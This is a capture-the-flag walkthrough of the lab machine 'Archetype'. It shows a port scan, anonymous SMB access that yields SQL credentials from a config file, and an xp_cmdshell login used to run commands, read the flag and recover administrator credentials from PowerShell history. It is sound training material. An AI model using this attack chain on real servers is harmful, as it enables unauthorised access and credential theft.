Archetype
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon archetype.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Whoops Team Views CVE-2022-23242 WildZarek
[OS] Windows (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-22 08:44 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:44
Completed NSE at 08:44, 0.00s elapsed
Initiating Ping Scan at 08:44
Scanning archetype.htb (10.129.141.247) [4 ports]
Completed Ping Scan at 08:44, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:44
Scanning archetype.htb (10.129.141.247) [65535 ports]
Discovered open port 135/tcp on 10.129.141.247
Discovered open port 139/tcp on 10.129.141.247
Discovered open port 445/tcp on 10.129.141.247
Discovered open port 49669/tcp on 10.129.141.247
Discovered open port 5985/tcp on 10.129.141.247
Discovered open port 49668/tcp on 10.129.141.247
Discovered open port 47001/tcp on 10.129.141.247
Discovered open port 49664/tcp on 10.129.141.247
Discovered open port 49667/tcp on 10.129.141.247
Discovered open port 1433/tcp on 10.129.141.247
Discovered open port 49666/tcp on 10.129.141.247
Discovered open port 49665/tcp on 10.129.141.247
Completed SYN Stealth Scan at 08:44, 16.06s elapsed (65535 total ports)
NSE: Script scanning 10.129.141.247.
Initiating NSE at 08:44
Completed NSE at 08:44, 0.00s elapsed
Nmap scan report for archetype.htb (10.129.141.247)
Host is up (0.075s latency).
Not shown: 63937 closed tcp ports (reset), 1586 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
NSE: Script Post-scanning.
Initiating NSE at 08:44
Completed NSE at 08:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.35 seconds
Raw packets sent: 79451 (3.496MB) | Rcvd: 68543 (2.742MB)
[+] [smb]
SMB archetype.htb 445 ARCHETYPE [*] Windows Server 2019 Standard 17763 x64 (name:ARCHETYPE) (domain:Archetype) (signing:False) (SMBv1:True)
[+] IP: archetype.htb:445 Name: unknown
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[~] [smb knocker]
[ADMIN$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[backups]
Current directory is \\archetype.htb\backups\
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020
5056511 blocks of size 4096. 2610907 blocks available
[C$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[IPC$]
Current directory is \\archetype.htb\IPC$\
NT_STATUS_INVALID_INFO_CLASS listing \*
recon reports twelve open ports and additionally recon drops smb information
┌──(root@ghost)-[/home/ghost]
└─# smbclient -N \\\\archetype.htb\\backups
Try "help" to get a list of possible commands.
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> exit
┌──(root@ghost)-[/home/ghost]
└─# cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
We obtain valid credentials to myssql service
┌──(root@ghost)-[/home/ghost]
└─# /usr/bin/impacket-mssqlclient ARCHETYPE/sql_svc:M3g4c0rp123@archetype.htb -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell dir C:\Users
output
--------------------------------------------------------------------------------
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
NULL
Directory of C:\Users
NULL
01/19/2020 04:10 PM <DIR> .
01/19/2020 04:10 PM <DIR> ..
01/19/2020 11:39 PM <DIR> Administrator
01/19/2020 11:39 PM <DIR> Public
01/20/2020 06:01 AM <DIR> sql_svc
0 File(s) 0 bytes
5 Dir(s) 10,721,202,176 bytes free
NULL
SQL> xp_cmdshell type C:\Users\sql_svc\Desktop\user.txt
output
--------------------------------------------------------------------------------
3e7b102e78218e935bf3f4951fec21a3
SQL>
We have user flag, time to elevate our privileges
SQL> xp_cmdshell powershell.exe -c (Get-PSReadlineOption).HistorySavePath
output
--------------------------------------------------------------------------------
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
NULL
SQL> xp_cmdshell type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
output
--------------------------------------------------------------------------------
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
NULL
SQL>
We have admin credentials